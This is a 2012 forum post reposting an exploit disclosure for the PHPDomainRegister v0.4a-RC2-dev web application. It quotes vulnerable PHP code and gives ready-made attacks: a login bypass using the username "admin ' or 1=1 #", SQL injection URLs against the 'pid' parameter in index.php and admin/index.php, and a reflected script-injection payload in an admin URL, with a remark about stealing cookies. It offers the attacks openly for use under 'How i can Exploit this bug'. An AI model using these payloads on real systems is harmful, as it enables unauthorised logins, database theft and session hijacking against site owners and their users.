The_Arhitect Posted January 16, 2012 Report Share Posted January 16, 2012 PHPDomainRegister v0.4a-RC2-dev Multiple VulnerabilitiesTitle = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]Author = Or4nG.M4nDownload = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rarThis Bug Powered By : GooGLeThnks :+----------------------------------+| xSs m4n i-Hmx Cyber-Crystal || Dr.Bnned ahwak2000 sa^Dev!L |+----------------------------------+ SQL Auth Bypassvuln : class_AjaxLogin.php line 73 function is_login() { <<<<==== 1 include ('../config.php'); <<<<==== 2 if(isset($_POST['username'])) { <<<<==== 3 $_SESSION['username'] = $_POST['username']; <<<<==== 4 $password = $_POST['password']; <<<<==== 5 $strSQL = <<<<==== 6 "SELECT * FROM `".$_SQL_PREFIX . $USER_Table_Name."` WHERE `LOGIN_NAME` = '".$_SESSION['username']."' AND password = md5('".$password."');"; <<<<==== 7 $result = mysql_query ($strSQL); <<<<==== 8 $row = mysql_fetch_row($result); <<<<==== 9 $exist = count($row); <<<<==== 10 if($exist >=2) { $this->jscript_location(); } <<<<==== 11 [jscript_location] function jscript_location() { <<<<==== 12 $this->set_session(); <<<<==== 13 echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14How i can Exploit this bug :just login as = > admin ' or 1=1 # SQL injectionvulnadmin/index.php line 212$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1$getpack = mysql_query($sql); <<<<==== 2line 1079 showPacket($pid); <<<<==== 3vulnindex.php line 617 $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1 $result = mysql_query($SQL); <<<<==== 2Exploit Here :index.php?usetype=domainauswahl&pid=%injectionhere%&use=Detailsadmin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie Cross Site Scrpting [xss]admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>Sursa: PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities Quote Link to comment Share on other sites More sharing options...